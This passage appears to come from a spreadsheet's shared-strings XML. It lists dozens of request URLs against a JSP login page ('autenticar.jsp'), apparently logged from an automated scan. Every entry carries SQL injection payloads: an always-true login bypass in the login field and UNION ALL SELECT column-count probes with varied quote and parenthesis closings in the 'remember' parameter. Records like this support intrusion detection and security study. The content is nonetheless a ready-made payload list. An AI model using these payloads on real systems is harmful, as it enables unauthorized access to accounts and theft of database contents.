    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185,8185--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029,2029--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324,3324--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565,1565--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855,8855--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516,1516--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749,3749--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591,9591--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362,362--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668,9668--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424,5424--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672,3672--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502,2502--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638,638--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614,3614--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227,5227--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718,6718--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768,5768--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552,4552--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752,8752--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264,3264--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7366,7366,7366,7366,7366,7366,7366,7366,7366,7366,7366,7366,7366,7366,7366,7366,7366,7366,7366,7366,7366--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502,8502--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406,8406--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355,4355--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733,6733--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784,3784--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434,9434--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504,7504--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470,8470--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3949,3949,3949,3949,3949,3949,3949,3949,3949,3949,3949,3949,3949,3949,3949,3949,3949,3949,3949,3949,3949--and(4045=4045&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366,6366--and(7911=7911&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230,7230--and(4717=4717&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923,9923--and(339=339&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114,2114--and(1048=1048&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875,6875--and(7893=7893&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826,3826--and(1100=1100&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307,5307--and(7105=7105&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091,3091--and(1400=1400&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492--and(9252=9252&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744,7744--and((1632=1632&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871,1871--and((9186=9186&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527,3527--and((8220=8220&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749,6749--and((8712=8712&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384--and((879=879&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241,3241--and((1286=1286&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935,8935--and((6012=6012&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896,2896--and((6192=6192&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239,5239--and((3917=3917&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581,1581--and((2853=2853&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339,1339--and(((9096=9096&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836,1836--and(((4611=4611&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017,5017--and(((8640=8640&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753,5753--and(((4918=4918&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190,3190--and(((7822=7822&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201,4201--and(((4882=4882&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779,779--and(((9895=9895&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805,3805--and(((8778=8778&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606,4606--and(((5027=5027&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389,1389--and(((8859=8859&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect5895,5895,5895,5895,5895,5895,5895,5895,5895,5895,5895,5895,5895,5895,5895,5895,5895,5895,5895,5895,5895--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842,3842--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220,2220--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836,8836--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157,2157--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759,759--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319,5319--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089,1089--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240,6240--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6089,6089,6089,6089,6089,6089,6089,6089,6089,6089,6089,6089,6089,6089,6089,6089,6089,6089,6089,6089,6089--and('ayby'='ayby&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578,7578--and('oryd'='oryd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747,6747--and('nfkp'='nfkp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112,9112--and('xsbi'='xsbi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112,5112--and('qihi'='qihi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923,8923--and('gnfa'='gnfa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532,532--and('cjoz'='cjoz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580,3580--and('fthm'='fthm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456,9456--and('zpry'='zpry&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968,8968--and('zyxf'='zyxf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--and(('mspc'='mspc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981,1981--and(('gxxn'='gxxn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332,8332--and(('geul'='geul&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402,4402--and(('uwiw'='uwiw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191,9191--and(('plis'='plis&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290,8290--and(('ooxo'='ooxo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774--and(('cjzd'='cjzd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103,9103--and(('gxou'='gxou&amp;modo=entrar</t>
  </si>
  <si>
